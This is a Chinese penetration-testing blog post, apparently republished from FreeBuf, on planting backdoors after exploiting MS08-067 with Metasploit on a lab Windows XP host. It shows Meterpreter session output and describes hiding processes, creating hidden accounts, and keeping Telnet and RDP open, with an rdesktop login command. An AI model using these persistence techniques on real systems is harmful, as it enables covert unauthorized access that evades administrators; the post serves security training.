来自后方世界的隐匿威胁:后门与持久代理(一)

干了十几年安全工作,发现一些同行只是把简单的工具扫描和渗透测试当成了全部工作,拿到需要的数据及测试结果既为完成工作。可各位兄弟,咱扪心自问,这样的安全测试能叫真的安全吗?所拿到的结果真的就是最终结果吗?下面,我想根据自己这些年的经验分享一下在职场中个人理解的渗透测试。

以往,我们渗透的主要目的是测试目标网络环境是否安全,是否存在哪些可见与不可见漏洞,然后将它们记录下来填充到安全报告中向客户进行展示。

其实我个人早期时候也有过同类的想法,随着从业时间增多,以及接触各式各样的案例之后开始明白,渗透测试主要侧重于发现在网络中存的安全隐患,并不能及时发现已经被入侵的主机系统的安全问题。

当我们开始做渗透测试工作时,此时的我们正处在一个“攻击者”身份,那么我们就要站在攻击者身份角度上来看待所面对的问题。

如果被测试目标已被我们所攻破,并且获得了想要的数据,那么后面又该做些什么呢?

就这样悄悄地清扫痕迹跑掉?事实并非如此,真正的攻击者会给主机留下后门,确保他们随时随地的能够在目标主机中随意出入且不被发现。

当然,为了不影响整体的连接控制及系统运行速度,攻击者会采用比较合理的方式来保持与目标主机之间的持久交互通信,而这种交互需要确保足够长期不易被其它维护人员所发现。我们一般成这种持久交互的工具或是名词术语为:后门(BackDoor)或恶意软件(RootKit)。

现在比较主流的自动化恶意软件和人为攻击概念使传统标签的定义变得模糊。后续我会着重分享几类经典的后门持久代理,让兄弟们对后门的各种技术有更多的了解和感悟。

下面,我们以ms08_067漏洞为例来分享演示,对一台装有Windows XP或windows 2k3系统的主机进行渗透测试。

执行代码:

msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.25.132:4444 [*] 192.168.25.133:445 - Automatically detecting the target… [*] 192.168.25.133:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 192.168.25.133:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 192.168.25.133:445 - Attempting to trigger the vulnerability… [*] Sending stage (957487 bytes) to 192.168.25.133 [*] Meterpreter session 1 opened (192.168.25.132:4444 -> 192.168.25.133:1038) at 2017-07-25 05:41:46 -0800

下图使用execute创建一个交互命令,-H隐藏的进程

通过命令,我们创建一个具有隐藏属性的身份进入到系统当中去。

很快,我们可以在系统进程中找到对应的位置(PID1444),正常情况下,日常使用人员很能发现隐藏cmd进程,目的是不暴露我们身份。

执行代码:

当创建新用户完成后,我们需要退出Windows命令Shell。此时需要开始Telnet服务,在提示符后执行run命令:

这时我们会看到显示的脚本内容表示,在被入侵系统当中已经建立了一个持久的Telnet服务。

为了可以随时访问它,我们需要用Telnet命令连接目标主机的IP地址,输入此前建立好的用户名和密码。

如果建立的这个持久Telnet不被目标所发现的话,就可以一直持续下去。需要说明的是,Telnet通常容易被检测到(因为以明文形式传送),并且主要使用命令行模式操作,所以较为复杂。

测试后我们发现:Telnet服务可以正常登录和访问目标客户端,说明本次渗透测试并建立telnet后门的安全测试成功。

接下来,我再分享一个采用GUI方式来访问被入侵系统的应用程序,通过它启动远程桌面协议RDP。

首先,我们需要确认是否已经拥有管理员权限和操作系统的版本,那么继续以Windows XP为例,使用meterpreter拿到目标系统交互命令的Shell后,输入reg命令来修改注册表信息。

为了确保我们所使用的RDP协议能够顺利通过目标防火墙,如果不能正常访问RDP还需要通过一些命令来增加主机安全规则。

通过上图,我们发现系统中远程桌面RDP服务并未开启,此时需要我们运行run命令手动来开启rdp该服务。

为了确保RDP不会再被攻击目标重启后还能处于开启状态,就需要通过sc命令对他进行一些配置。

在确保RDP保持长久开启状态后,我们为了配合后续操作,要创建一个隐藏的账户,同时对注册表方面也要进行必要的调整来保持它的持久性。

执行代码如下:

此时我们该做的工作基本完成,剩下的就是安全测试阶段了。

使用rdesktop程序连接到被入侵的系统远程桌面。

root@2cats:~# rdesktop -a 16 -u admin -p 123456 192.168.25.133:3389

我们在安全测试过程中对桌面的分辨率、用户名、密码、服务器地址和端口进行相应调整,当然,大家也可以通过配置注册表来修改远程桌面的默认端口操作。

如上图所示,证明我们的安全测试成功了。

今天就到这里,将两种后门长久连接方式分享给大家,希望对新入行的朋友能够有所帮助,安全渗透测试技术是一方面,其次思路也很重要。

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2017-10-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

俄罗斯黑客是如何滥用twitter作为Hammertoss C&C服务器的?

本文我们将复制一项技术,我们曾用它来追踪一个叫做Hammertoss的复杂俄罗斯恶意软件,该恶意软件的创造者滥用知名网站(比如twitter和github)来跃...

2205
来自专栏FreeBuf

如何使用Airgeddon搭建基于软件的WIFI干扰器

Airgeddon是一款能够进行Wi-Fi干扰的多Bash网络审计工具,它可以允许你在未加入目标网络的情况下设置目标,并且断开目标网络中的所有设备。Airged...

35210
来自专栏美团技术团队

美团点评酒店后台故障演练系统

本文由曾鋆、海智、亚辉、孟莹四位作者共同创作完成。 背景介绍 随着海量请求、节假日峰值流量和与日俱增的系统复杂度出现的,很有可能是各种故障。在分析以往案例时我...

5597
来自专栏FreeBuf

如何通过WIFI渗透企业内网?

介绍 黑盒渗透测试意味着白帽子对目标网络一无所知。模拟黑客攻击网络,并获取敏感信息。进一步,探索内网,识别内网中的漏洞,通过漏洞访问网络里的重要资源。 目的 在...

3378
来自专栏信安之路

细节决定成败-WIFI新玩法

最近网络非常的不好看看网页都会卡,哇是真的生气。没有网络的我和咸鱼有什么区别。然后我就想用一下邻居的 WiFi,结果。。跑包钓鱼都没有出来。

1300
来自专栏数据和云

五重备份无一有效,还有哪些 rm -rf 和GitLab类似的忧伤?

DBA的悲伤,不是没有做备份,就是没有做有效的备份。日光之下,并无鲜事。 都说一个没有删过数据库的DBA,职业生涯是不完整的,不过当你删过之后,你的DBA生涯可...

4215
来自专栏黑白安全

metasploit渗透终极防御终极方法总结

睡不着就无聊玩玩metasploit攻击,哎让我大失所所望.整来整去是一个垃圾东东.可能对win还用点没有那么多安全防御手段.可是对于linux.bsd简直就是...

1273
来自专栏美团技术团队

服务容错模式

背景 随着美团点评服务框架和服务治理体系的逐步成熟,服务化已成为公司内部系统设计的趋势。本着大系统小做、职责单一的原则,我们度假技术团队对业务系统进行了不少服务...

4394
来自专栏程序员阿凯

GitHub 可以被收购,Git 命令你不能不会

1654
来自专栏happyJared

解决百度蜘蛛无法爬取Hexo博客的问题

  由于GitHub Pages是拒绝百度爬虫爬取的,包括用Hexo或Jekyll搭建的博客,因此你的站点再怎么SEO优化,这在国内也是收录和搜索不到的。本文介...

2381

扫码关注云+社区

领取腾讯云代金券